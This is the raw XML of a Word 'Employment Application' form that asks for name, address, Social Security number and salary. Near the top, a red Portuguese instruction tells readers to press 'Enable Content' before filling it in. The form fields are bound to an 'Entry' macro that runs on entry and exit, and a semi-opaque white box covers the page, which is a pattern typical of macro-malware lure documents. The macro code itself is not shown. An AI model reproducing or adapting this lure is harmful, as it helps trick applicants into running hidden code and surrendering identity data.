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GridTableLight"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="0620" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5040"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr w:rsidR="00856C35" w14:paraId="55391DFB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428" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC361A3" w14:textId="77777777" w:rsidR="00856C35" w:rsidRDefault="00856C35" w:rsidP="00856C35">
            <w:r w:rsidRPr="00856C35">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325930A5" wp14:editId="1AC27101">
                  <wp:extent cx="853440" cy="426720"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="3" name="Picture 1" descr="your logo he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3440" cy="4267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28" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18858482" w14:textId="77777777" w:rsidR="00856C35" w:rsidRDefault="00856C35" w:rsidP="00856C35">
            <w:pPr>
              <w:pStyle w:val="CompanyName"/>
            </w:pPr>
            <w:r>
              <w:t>Company Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B400D37" w14:textId="471DAFDF" w:rsidR="00467865" w:rsidRDefault="00856C35" w:rsidP="00856C35">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Employment Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F0D587" w14:textId="5841DF8D" w:rsidR="002578A4" w:rsidRPr="002578A4" w:rsidRDefault="002578A4" w:rsidP="002578A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">Para preencher o documento necessita de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>Ativar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conteúdo/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>Enable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>Content</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002578A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>na barra amarela superior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347A117" w14:textId="45ED62EF" w:rsidR="00856C35" w:rsidRDefault="005C6576" w:rsidP="00856C35">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN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EF94124" wp14:editId="15E7C7BF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-170411</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>85725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6658495" cy="7597833"/>
                <wp:effectExtent l="0" t="0" r="9525" b="31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58495" cy="7597833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8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2" o:spid="_x0000_s1026" style="position:absolute;margin-left:-13.4pt;margin-top:6.75pt;width:524.3pt;height:598.2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PMKnAIAAKgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFFPGzEMfp+0/xDlfVxbWihVr6gCMU1C&#10;gICJ5zSX9E5K4ixJe+1+/ZzkegXG9jCtD2kc25/t72zPL3daka1wvgFT0uHJgBJhOFSNWZf0+/PN&#10;lyklPjBTMQVGlHQvPL1cfP40b+1MjKAGVQlHEMT4WWtLWodgZ0XheS008ydghUGlBKdZQNGti8qx&#10;FtG1KkaDwVnRgqusAy68x9frrKSLhC+l4OFeSi8CUSXF3EI6XTpX8SwWczZbO2brhndpsH/IQrPG&#10;YNAe6poFRjau+Q1KN9yBBxlOOOgCpGy4SDVgNcPBu2qeamZFqgXJ8banyf8/WH63fXCkqUo6osQw&#10;jZ/oEUljZq0EGUV6WutnaPVkH1wnebzGWnfS6fiPVZBdonTfUyp2gXB8PDubTMcXE0o46s4nF+fT&#10;09OIWhzdrfPhqwBN4qWkDsMnKtn21odsejCJ0TyoprpplEpC7BNxpRzZMvzCq/Uwuypbs/w0HeCv&#10;i5i6Klqn+G+AlIlwBiJwjhlfilh8Ljfdwl6JaKfMo5DIGhY4SgF75ByUcS5MyLn4mlUiP0/+mEsC&#10;jMgS4/fYHcDbGg/YOcvOPrqK1O698+BviWXn3iNFBhN6Z90YcB8BKKyqi5ztDyRlaiJLK6j22FMO&#10;8rB5y28a/LK3zIcH5nC6cA5xY4R7PKSCtqTQ3Sipwf386D3aY9OjlpIWp7Wk/seGOUGJ+mZwHC6G&#10;43Ec7ySMJ+cjFNxrzeq1xmz0FWC7DHE3WZ6u0T6ow1U60C+4WJYxKqqY4Ri7pDy4g3AV8hbB1cTF&#10;cpnMcKQtC7fmyfIIHlmNnfu8e2HOdu0dcDLu4DDZbPauy7Nt9DSw3ASQTRqBI68d37gOUhN3qyvu&#10;m9dysjou2MUvAAAA//8DAFBLAwQUAAYACAAAACEAqccLgt8AAAAMAQAADwAAAGRycy9kb3ducmV2&#10;LnhtbEyPwU7DMBBE70j8g7VI3Fo7Bqo2xKkQEodKcKAgzm5snIh47cZukv492xPcdndGs2+q7ex7&#10;NtohdQEVFEsBzGITTIdOwefHy2INLGWNRvcBrYKzTbCtr68qXZow4bsd99kxCsFUagVtzrHkPDWt&#10;9TotQ7RI2ncYvM60Do6bQU8U7nsuhVhxrzukD62O9rm1zc/+5BVEM270l+NHGXfH6ex24fWtu1fq&#10;9mZ+egSW7Zz/zHDBJ3SoiekQTmgS6xUs5IrQMwl3D8AuBiELuhxokoUQwOuK/y9R/wIAAP//AwBQ&#10;SwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlw&#10;ZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVs&#10;cy8ucmVsc1BLAQItABQABgAIAAAAIQAusPMKnAIAAKgFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMv&#10;ZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCpxwuC3wAAAAwBAAAPAAAAAAAAAAAAAAAAAPYEAABk&#10;cnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAAgYAAAAA&#10;" fillcolor="white [3212]" stroked="f" strokeweight="2pt">
                <v:fill opacity="52428f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00856C35" w:rsidRPr="00856C35">
        <w:t>Applicant Information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2940"/>
        <w:gridCol w:w="2865"/>
        <w:gridCol w:w="668"/>
        <w:gridCol w:w="681"/>
        <w:gridCol w:w="1845"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A82BA3" w:rsidRPr="005114CE" w14:paraId="7D43D49D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81" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DFBCC57" w14:textId="77777777" w:rsidR="00A82BA3" w:rsidRPr="005114CE" w:rsidRDefault="00A82BA3" w:rsidP="00490804">
            <w:r w:rsidRPr="00D6155E">
              <w:t>Full Name</w:t>
            </w:r>
            <w:r w:rsidRPr="005114CE">
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FDB0F68" w14:textId="6E6EBE09" w:rsidR="00A82BA3" w:rsidRPr="005C6576" w:rsidRDefault="005C6576" w:rsidP="008634F1">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin">
                <w:ffData>
                  <w:name w:val="Text2"/>
                  <w:enabled/>
                  <w:calcOnExit w:val="0"/>
                  <w:entryMacro w:val="Entry"/>
                  <w:exitMacro w:val="Entry"/>
                  <w:textInput/>
                </w:ffData>
              </w:fldChar>
            </w:r>
            <w:bookmarkStart w:id="0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2865" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31EACE8A" w14:textId="06888637" w:rsidR="00A82BA3" w:rsidRPr="009C220D" w:rsidRDefault="00B74822" w:rsidP="00440CD8">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin">
                <w:ffData>
                  <w:name w:val="Text3"/>
                  <w:enabled/>
                  <w:calcOnExit w:val="0"/>
                  <w:entryMacro w:val="Entry"/>
                  <w:exitMacro w:val="Entry"/>
                  <w:textInput/>
                </w:ffData>
              </w:fldChar>
            </w:r>
            <w:bookmarkStart w:id="1" w:name="Text3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668" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18026218" w14:textId="4E8F534B" w:rsidR="00A82BA3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4"/>
                  <w:enabled/>
                  <w:calcOnExit w:val="0"/>
                  <w:entryMacro w:val="Entry"/>
                  <w:textInput/>
                </w:ffData>
              </w:fldChar>
            </w:r>
            <w:bookmarkStart w:id="2" w:name="Text4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681" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E7A0404" w14:textId="77777777" w:rsidR="00A82BA3" w:rsidRPr="005114CE" w:rsidRDefault="00A82BA3" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3"/>
            </w:pPr>
            <w:r w:rsidRPr="00490804">
              <w:t>Date</w:t>
            </w:r>
            <w:r w:rsidRPr="005114CE">
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19F8EA5E" w14:textId="0FFA923D" w:rsidR="00A82BA3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1"/>
                  <w:enabled/>
                  <w:calcOnExit w:val="0"/>
                  <w:entryMacro w:val="Entry"/>
                  <w:textInput/>
                </w:ffData>
              </w:fldChar>
            </w:r>
            <w:bookmarkStart w:id="3" w:name="Text1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856C35" w:rsidRPr="005114CE" w14:paraId="43147686" w14:textId="77777777" w:rsidTr="00FF1313">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E407B47" w14:textId="77777777" w:rsidR="00856C35" w:rsidRPr="00D6155E" w:rsidRDefault="00856C35" w:rsidP="00440CD8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AC63086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Last</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2865" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20408DCD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First</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="678CB488" w14:textId="77777777" w:rsidR="00856C35" w:rsidRPr="00490804" w:rsidRDefault="00856C35" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:outlineLvl w:val="2"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00490804">
              <w:t>M.I.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="681" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF6B50D" w14:textId="77777777" w:rsidR="00856C35" w:rsidRPr="005114CE" w:rsidRDefault="00856C35" w:rsidP="00856C35"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="628C7FEC" w14:textId="77777777" w:rsidR="00856C35" w:rsidRPr="009C220D" w:rsidRDefault="00856C35" w:rsidP="00856C35"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0313BAD7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7199"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A82BA3" w:rsidRPr="005114CE" w14:paraId="4D13B77E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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F37A83" w14:textId="77777777" w:rsidR="00A82BA3" w:rsidRPr="005114CE" w:rsidRDefault="00A82BA3" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Address:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7199" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65AFB41A" w14:textId="03691449" w:rsidR="00A82BA3" w:rsidRPr="00FF1313" w:rsidRDefault="005A0F34" w:rsidP="00440CD8">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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4" w:name="Text5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209D495A" w14:textId="0753D05F" w:rsidR="00A82BA3" w:rsidRPr="00FF1313" w:rsidRDefault="005A0F34" w:rsidP="00440CD8">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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5" w:name="Text6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856C35" w:rsidRPr="005114CE" w14:paraId="244A0010" w14:textId="77777777" w:rsidTr="00FF1313">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="087346A7" w14:textId="77777777" w:rsidR="00856C35" w:rsidRPr="005114CE" w:rsidRDefault="00856C35" w:rsidP="00440CD8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7199" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="496A1B08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Street Address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14:paraId="069BDBC0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Apartment/Unit #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45F118D7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5805"/>
        <w:gridCol w:w="1394"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C76039" w:rsidRPr="005114CE" w14:paraId="740EE4D0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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D52BE55" w14:textId="77777777" w:rsidR="00C76039" w:rsidRPr="005114CE" w:rsidRDefault="00C76039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bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A5C8EA1" w14:textId="138BE0C8" w:rsidR="00C76039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6" w:name="Text7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tc>
          <w:tcPr>
            <w:tcW w:w="1394" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4BD8A8D4" w14:textId="79331E46" w:rsidR="00C76039" w:rsidRPr="005114CE" w:rsidRDefault="005A0F34" w:rsidP="00440CD8">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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7" w:name="Text8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51D1AE0C" w14:textId="0362B200" w:rsidR="00C76039" w:rsidRPr="005114CE" w:rsidRDefault="005A0F34" w:rsidP="00440CD8">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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8" w:name="Text9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856C35" w:rsidRPr="005114CE" w14:paraId="4E000C8E" w14:textId="77777777" w:rsidTr="00FF1313">
        <w:trPr>
          <w:trHeight w:val="288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1081" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A6CF353" w14:textId="77777777" w:rsidR="00856C35" w:rsidRPr="005114CE" w:rsidRDefault="00856C35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top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40BFA96B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City</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13D347DD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State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14:paraId="2B78A288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ZIP Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72EE728F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3690"/>
        <w:gridCol w:w="720"/>
        <w:gridCol w:w="4590"/>
      </w:tblGrid>
      <w:tr w:rsidR="00841645" w:rsidRPr="005114CE" w14:paraId="56B889AF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40ADC306" w14:textId="77777777" w:rsidR="00841645" w:rsidRPr="005114CE" w:rsidRDefault="00841645" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Phone:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="651F8662" w14:textId="764EC9FB" w:rsidR="00841645" w:rsidRPr="009C220D" w:rsidRDefault="005A0F34" w:rsidP="00856C35">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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9" w:name="Text10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720" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05734934" w14:textId="77777777" w:rsidR="00841645" w:rsidRPr="005114CE" w:rsidRDefault="00C92A3C" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3"/>
            </w:pPr>
            <w:r>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidR="003A41A1">
              <w:t>mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4590" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32CBFD13" w14:textId="3815C97A" w:rsidR="00841645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0" w:name="Text11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</w:tbl>
    <w:p w14:paraId="0086D8DE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66"/>
        <w:gridCol w:w="1414"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00613129" w:rsidRPr="005114CE" w14:paraId="6C93B95F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66" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503A6B67" w14:textId="77777777" w:rsidR="00613129" w:rsidRPr="005114CE" w:rsidRDefault="00613129" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Date Available:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C373571" w14:textId="1CD75045" w:rsidR="00613129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1" w:name="Text12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1890" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0A325B" w14:textId="77777777" w:rsidR="00613129" w:rsidRPr="005114CE" w:rsidRDefault="00613129" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3"/>
            </w:pPr>
            <w:r w:rsidRPr="005114CE">
              <w:t xml:space="preserve">Social Security </w:t>
            </w:r>
            <w:r w:rsidR="00B11811" w:rsidRPr="005114CE">
              <w:t>No.</w:t>
            </w:r>
            <w:r w:rsidRPr="005114CE">
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B3A7BBE" w14:textId="691B0416" w:rsidR="00613129" w:rsidRPr="009C220D" w:rsidRDefault="005A0F34" w:rsidP="00440CD8">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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2" w:name="Text13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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA9E1B7" w14:textId="77777777" w:rsidR="00613129" w:rsidRPr="005114CE" w:rsidRDefault="00613129" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3"/>
            </w:pPr>
            <w:r w:rsidRPr="005114CE">
              <w:t>Desired Salary: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7945246F" w14:textId="7E6908DE" w:rsidR="00613129" w:rsidRPr="009C220D" w:rsidRDefault="005A0F34" w:rsidP="00856C35">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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3" w:name="Text14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</w:tbl>
    <w:p w14:paraId="7A3B65DF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803"/>
        <w:gridCol w:w="8277"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE7FB7" w:rsidRPr="005114CE" w14:paraId="5D3235E6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803" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53C01FA9" w14:textId="77777777" w:rsidR="00DE7FB7" w:rsidRPr="005114CE" w:rsidRDefault="00C76039" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Position Applied for:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8277" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C8B75C8" w14:textId="705D67FC" w:rsidR="00DE7FB7" w:rsidRPr="009C220D" w:rsidRDefault="005A0F34" w:rsidP="00083002">
            <w:pPr>
              <w:pStyle w:val="FieldText"/>
            </w:pPr>
            <w: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4" w:name="Text15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</w:tbl>
    <w:p w14:paraId="6A4A93E4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4031"/>
        <w:gridCol w:w="517"/>
        <w:gridCol w:w="666"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C220D" w:rsidRPr="005114CE" w14:paraId="0582854C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4A187BC7" w14:textId="77777777" w:rsidR="009C220D" w:rsidRPr="005114CE" w:rsidRDefault="009C220D" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Are you a citizen of the United States?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="285154FD" w14:textId="77777777" w:rsidR="009C220D" w:rsidRPr="00D6155E" w:rsidRDefault="009C220D" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Checkbox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6155E">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533643A1" w14:textId="395F73F7" w:rsidR="009C220D" w:rsidRPr="005114CE" w:rsidRDefault="00724FA4" w:rsidP="00083002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Check3"/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  <w:bookmarkEnd w:id="15"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="509" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63CD4988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558AE2A3" w14:textId="3450A1ED" w:rsidR="009C220D" w:rsidRPr="00D6155E" w:rsidRDefault="00724FA4" w:rsidP="00083002">
            <w:pPr>
              <w:pStyle w:val="Checkbox"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6155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Check4"/>
            <w:r w:rsidR="009C220D" w:rsidRPr="00D6155E">
              <w:instrText xml:space="preserve"> FORMCHECKBOX </w:instrText>
            </w:r>
            <w:r w:rsidR="00480163">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00D6155E">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:bookmarkEnd w:id="16"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C256733" w14:textId="77777777" w:rsidR="009C220D" w:rsidRPr="005114CE" w:rsidRDefault="009C220D" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3"/>
            </w:pPr>
            <w:r w:rsidRPr="005114CE">
              <w:t>If no, are you authorized to work in the U.S.?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="517" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F4DD27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39D501E7" w14:textId="62D019F4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666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB6C180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6D2A2962" w14:textId="320333B5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</w:tr>
    </w:tbl>
    <w:p w14:paraId="7B406F46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1359"/>
        <w:gridCol w:w="3855"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C220D" w:rsidRPr="005114CE" w14:paraId="046ABA12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71F9D93F" w14:textId="77777777" w:rsidR="009C220D" w:rsidRPr="005114CE" w:rsidRDefault="009C220D" w:rsidP="00490804">
            <w:r w:rsidRPr="005114CE">
              <w:t>Have you ever worked for this company?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="191039CE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1E864750" w14:textId="15BAB98A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</w:tcPr>
          <w:p w14:paraId="206A99BD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34989AB0" w14:textId="5EDFED8E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1359" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D732029" w14:textId="77777777" w:rsidR="009C220D" w:rsidRPr="005114CE" w:rsidRDefault="009C220D" w:rsidP="00490804">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:outlineLvl w:val="3"/>
            </w:pPr>
            <w:r w:rsidRPr="005114CE">
              <w:t xml:space="preserve">If </w:t>
            </w:r>
            <w:r w:rsidR="00E106E2">
              <w:t>yes</w:t>
            </w:r>
            <w:r w:rsidRPr="005114CE">
              <w:t>, w</w:t>
            </w:r>
            <w:r w:rsidRPr="00490804">
              <w:t>h</w:t>
            </w:r>
